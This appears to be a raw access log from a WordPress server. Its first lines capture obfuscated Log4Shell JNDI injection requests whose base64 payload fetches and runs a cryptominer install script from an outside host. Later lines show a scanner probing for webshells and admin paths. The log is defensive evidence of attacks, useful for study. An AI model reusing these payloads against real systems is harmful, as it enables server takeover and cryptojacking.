80.75.212.83 - - [16/Sep/2025:10:12:49 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
80.75.212.83 - - [16/Sep/2025:10:12:51 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg== HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
42.236.17.17 - - [16/Sep/2025:10:13:38 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
42.236.17.17 - - [16/Sep/2025:10:13:41 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:10:14:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757988844.9339680671691894531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
4.227.95.245 - - [16/Sep/2025:10:14:05 +0800] "GET /include/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:05 +0800] "GET /info.php HTTP/1.1" 200 29 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:05 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:05 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:06 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:06 +0800] "GET /buy.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:06 +0800] "GET /fix.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:06 +0800] "GET /xmrlpc.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:06 +0800] "GET /adminfuns.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:07 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:07 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:07 +0800] "GET /css.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:07 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:08 +0800] "GET /admin/function.php HTTP/1.1" 404 27 "-" "-"
87.120.191.70 - - [16/Sep/2025:10:14:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
4.227.95.245 - - [16/Sep/2025:10:14:08 +0800] "GET /class.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:08 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:08 +0800] "GET /nc4.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:08 +0800] "GET /gelay.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:09 +0800] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:09 +0800] "GET /bak.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:09 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:09 +0800] "GET /wp-cron.php HTTP/1.1" 200 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:09 +0800] "GET /themes/zMousse/otuz1.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:10 +0800] "GET /.well-known/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:11 +0800] "GET /.well-known/acme-challenge/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:12 +0800] "GET /.well-knownold/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:13 +0800] "GET /cgi-bin/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:14 +0800] "GET /local/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:16 +0800] "GET /Public/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:17 +0800] "GET /Site/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:18 +0800] "GET /Assets/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:19 +0800] "GET /assets/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:20 +0800] "GET /components/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:21 +0800] "GET /modules/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:22 +0800] "GET /system/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:23 +0800] "GET /php/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:24 +0800] "GET /template/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:25 +0800] "GET /files/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:26 +0800] "GET /images/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:27 +0800] "GET /uploads/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:28 +0800] "GET /upload/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:29 +0800] "GET /upload/image/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:30 +0800] "GET /vendor/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:31 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:32 +0800] "GET /assets/images/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:35 +0800] "GET /index/function.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:35 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:36 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:36 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:36 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:36 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:36 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:37 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:37 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:37 +0800] "GET /edit.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:37 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:37 +0800] "GET /gecko.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:38 +0800] "GET /goat.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:38 +0800] "GET /goods.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:38 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:38 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:38 +0800] "GET /mm.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:39 +0800] "GET /tinyfilemanager.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:39 +0800] "GET /users.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:39 +0800] "GET /wsa.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:40 +0800] "GET /admin/ HTTP/1.1" 302 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:41 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:42 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:43 +0800] "GET /Admin/uploads/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:45 +0800] "GET /admin/uploads/ HTTP/1.1" 404 31381 "-" "-"
36.133.115.36 - - [16/Sep/2025:10:14:47 +0800] "POST /wp-cron.php?doing_wp_cron=1757988887.0158948898315429687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
4.227.95.245 - - [16/Sep/2025:10:14:47 +0800] "GET /admin/uploads/images/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:48 +0800] "GET /admin/images/slider/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:49 +0800] "GET /admin/controller/extension/extension/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:50 +0800] "GET /admin/editor/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:52 +0800] "GET /admin/fckeditor/editor/filemanager/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:52 +0800] "GET /w.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:52 +0800] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:53 +0800] "GET /wp-admin/images/moon.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:53 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:53 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 409 2667 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:53 +0800] "GET /wp-api.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:54 +0800] "GET /wp-content/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:54 +0800] "GET /wp-includes/IXR/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:54 +0800] "GET /wp-includes/fonts/admin.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:54 +0800] "GET /wp-setup.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:54 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:55 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:56 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:56 +0800] "GET /wp-admin/js/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:57 +0800] "GET /wp-admin/css/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:57 +0800] "GET /wp-admin/css/colors/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:57 +0800] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:57 +0800] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:57 +0800] "GET /wp-admin/css/colors/light/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:58 +0800] "GET /wp-admin/images/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:58 +0800] "GET /wp-admin/includes/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:14:59 +0800] "GET /wp-admin/meta/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:00 +0800] "GET /wp-admin/network/ HTTP/1.1" 302 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:00 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fnetwork%2F&reauth=1 HTTP/1.1" 200 8680 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:01 +0800] "GET /wp-admin/user/ HTTP/1.1" 302 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:02 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fuser%2F&reauth=1 HTTP/1.1" 200 8677 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:03 +0800] "GET /wp-admin/maint/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:03 +0800] "GET /wp-content/ HTTP/1.1" 200 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:03 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:03 +0800] "GET /wp-content/plugins/ HTTP/1.1" 200 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:04 +0800] "GET /wp-content/plugins/ninja-forms/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:04 +0800] "GET /wp-content/themes/ HTTP/1.1" 200 5 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:05 +0800] "GET /wp-content/themes/classic/inc/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:06 +0800] "GET /wp-content/mu-plugins/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:07 +0800] "GET /wp-content/mu-plugins-old/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:08 +0800] "GET /wp-content/upgrade/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:08 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:08 +0800] "GET /wp-includes/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:09 +0800] "GET /wp-includes/js/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:09 +0800] "GET /wp-includes/js/codemirror/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:09 +0800] "GET /wp-includes/js/crop/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:09 +0800] "GET /wp-includes/css/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:09 +0800] "GET /wp-includes/fonts/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:10 +0800] "GET /wp-includes/fonts/index.php HTTP/1.1" 404 27 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:10 +0800] "GET /wp-includes/images/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:10 +0800] "GET /wp-includes/images/crystal/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:10 +0800] "GET /wp-includes/images/smilies/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:10 +0800] "GET /wp-includes/images/media/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:11 +0800] "GET /wp-includes/images/wlw/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:12 +0800] "GET /wp-includes/assets/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:12 +0800] "GET /wp-includes/block-patterns/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:12 +0800] "GET /wp-includes/block-supports/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:12 +0800] "GET /wp-includes/certificates/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:13 +0800] "GET /wp-includes/customize/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:13 +0800] "GET /wp-includes/html-api/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:13 +0800] "GET /wp-includes/php-compat/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:13 +0800] "GET /wp-includes/pomo/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:13 +0800] "GET /wp-includes/rest-api/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:14 +0800] "GET /wp-includes/rest-api/endpoints/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:14 +0800] "GET /wp-includes/rest-api/fields/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:14 +0800] "GET /wp-includes/rest-api/search/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:14 +0800] "GET /wp-includes/sitemaps/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:15 +0800] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:15 +0800] "GET /wp-includes/theme-compat/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:15 +0800] "GET /wp-includes/Requests/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:16 +0800] "GET /wp-includes/Requests/Auth/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:17 +0800] "GET /wp-includes/Requests/Cookie/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:18 +0800] "GET /wp-includes/Requests/Exception/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:19 +0800] "GET /wp-includes/Requests/Exception/HTTP/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:20 +0800] "GET /wp-includes/Requests/Proxy/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:21 +0800] "GET /wp-includes/Requests/Response/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:22 +0800] "GET /wp-includes/Requests/Transport/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:23 +0800] "GET /wp-includes/Requests/Utility/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:24 +0800] "GET /wp-includes/ID3/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:24 +0800] "GET /wp-includes/IXR/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:24 +0800] "GET /wp-includes/PHPMailer/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:24 +0800] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:25 +0800] "GET /wp-includes/SimplePie/Cache/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:26 +0800] "GET /wp-includes/SimplePie/Content/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:27 +0800] "GET /wp-includes/SimplePie/Content/Type/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:28 +0800] "GET /wp-includes/Text/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:28 +0800] "GET /wp-includes/Text/Diff/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:28 +0800] "GET /wp-includes/Text/Diff/Engine/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:29 +0800] "GET /wp-includes/Text/Diff/Engine/Engine/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:29 +0800] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:30 +0800] "GET /wp-includes/random_compat/ HTTP/1.1" 404 31381 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:31 +0800] "GET /wp-includes/sodium_compat/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:31 +0800] "GET /wp-includes/sodium_compat/src/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:31 +0800] "GET /wp-includes/widgets/ HTTP/1.1" 403 146 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:31 +0800] "GET /wp-includes/blocks/ HTTP/1.1" 200 12 "-" "-"
4.227.95.245 - - [16/Sep/2025:10:15:32 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
36.133.115.36 - - [16/Sep/2025:10:25:27 +0800] "POST /wp-cron.php?doing_wp_cron=1757989527.2055780887603759765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.156.87.179 - - [16/Sep/2025:10:25:28 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [16/Sep/2025:10:30:07 +0800] "POST /wp-cron.php?doing_wp_cron=1757989807.8199150562286376953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
135.237.123.168 - - [16/Sep/2025:10:30:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [16/Sep/2025:10:34:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757990056.8480269908905029296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [16/Sep/2025:10:34:17 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:10:35:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757990121.4365470409393310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [16/Sep/2025:10:35:21 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [16/Sep/2025:10:37:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757990224.8945829868316650390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:10:37:04 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:11:02:59 +0800] "POST /wp-cron.php?doing_wp_cron=1757991779.5055429935455322265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
